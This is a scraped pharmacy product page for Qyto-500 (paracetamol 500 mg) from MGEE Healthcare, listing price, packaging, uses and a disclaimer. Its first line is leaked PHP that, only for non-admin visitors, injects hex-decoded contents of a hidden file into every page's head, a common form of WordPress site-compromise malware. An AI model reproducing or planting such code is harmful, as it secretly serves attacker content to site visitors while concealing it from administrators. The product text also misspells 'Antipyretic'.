if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Qyto-500 - MGEE Healthcare
Composition: Paracetamol IP 500
Packaging: 10x10
Unit: Box
MRP: 11.30
Food/Drug: Drug
Medicine Type: Anipyretic
Fill the form below

Paracetamol 500mg Tablet helps relieve pain and fever by blocking the release of certain chemical messengers responsible for fever and pain. It is used to treat headaches, migraine, nerve pain, toothache, sore throat, period (menstrual) pains, arthritis, muscle aches, and the common cold.

Disclaimer:
Mgee Healthcare’s sole intention is to ensure that its consumers get expert-reviewed, accurate, and trustworthy information. However, the information contained herein should NOT be used as a substitute for the advice of a qualified physician. The information provided here is for informational purposes only. This may not cover all possible side effects, drug interactions, warnings, or alerts. Please consult your doctor and discuss all your queries related to any disease or medicine. We intend to support, not replace, the doctor-patient relationship. The Database is still under development and may contain inaccuracies. It is not intended as a substitute for the expertise and a judgment of your physician, a pharmacist, or the other healthcare professional. It should not be construed to indicate that the use of any medication in any country is safe, appropriate, or effective for you. Consult with your healthcare professional before taking any medication.

Related Products
Menu